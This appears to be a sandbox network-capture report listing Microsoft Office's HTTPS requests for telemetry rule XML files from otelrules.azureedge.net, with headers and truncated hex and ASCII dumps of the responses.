                                                                                2024-10-04 09:34:08 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                96192.168.2.55551613.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:08 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:08 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:08 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1358
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                ETag: "0x8DC582BE022ECC5"
                                                                                x-ms-request-id: a76247f8-001e-00a2-558c-15d4d5000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093408Z-15767c5fc55fdfx81a30vtr1fw0000000ckg000000009umb
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:08 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                97192.168.2.55551713.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:08 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:08 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:08 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1389
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                ETag: "0x8DC582BE10A6BC1"
                                                                                x-ms-request-id: 7afec1f8-601e-000d-328c-152618000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093408Z-15767c5fc55w69c2zvnrz0gmgw0000000cpg000000000ngs
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:08 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                98192.168.2.55551913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:08 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:08 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:08 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1405
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                ETag: "0x8DC582BE12B5C71"
                                                                                x-ms-request-id: 4a217eb8-401e-00a3-218c-158b09000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093408Z-15767c5fc55kg97hfq5uqyxxaw0000000cd0000000002ntw
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:08 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                99192.168.2.55551813.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:08 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:08 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:08 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1352
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                ETag: "0x8DC582BE9DEEE28"
                                                                                x-ms-request-id: 92784c80-801e-002a-088c-1531dc000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093408Z-15767c5fc554wklc0x4mc5pq0w0000000cmg000000008yuh
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:08 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                100192.168.2.55552513.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:08 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:08 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:08 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1368
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                ETag: "0x8DC582BDDC22447"
                                                                                x-ms-request-id: c825d9ef-901e-007b-278c-15ac50000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093408Z-15767c5fc55whfstvfw43u8fp40000000cfg0000000052u3
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:08 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                101192.168.2.55553013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:09 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:09 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:09 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1364
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                ETag: "0x8DC582BE1223606"
                                                                                x-ms-request-id: ed356ac5-101e-0046-2b8c-1591b0000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093409Z-15767c5fc55whfstvfw43u8fp40000000ceg0000000069xx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:09 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                102192.168.2.55552913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:09 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:09 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:09 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1401
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                ETag: "0x8DC582BE055B528"
                                                                                x-ms-request-id: 6a90350a-301e-005d-348c-15e448000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093409Z-15767c5fc55v7j95gq2uzq37a00000000cn0000000002g81
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:09 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                103192.168.2.55553313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:09 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:09 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:09 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1403
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                ETag: "0x8DC582BDCB4853F"
                                                                                x-ms-request-id: 6ec2e3f4-801e-007b-208c-15e7ab000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093409Z-15767c5fc55rg5b7sh1vuv8t7n0000000cn0000000007scn
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:09 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                104192.168.2.55553213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:09 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:09 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:09 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1397
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                ETag: "0x8DC582BE7262739"
                                                                                x-ms-request-id: 76616de5-c01e-0082-6f8c-15af72000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093409Z-15767c5fc55sdcjq8ksxt4n9mc00000001q0000000003zv7
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:09 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                105192.168.2.55553113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:09 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:09 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:09 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1360
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                ETag: "0x8DC582BDDEB5124"
                                                                                x-ms-request-id: 29534450-901e-0064-768c-15e8a6000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093409Z-15767c5fc55rg5b7sh1vuv8t7n0000000csg0000000019r8
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
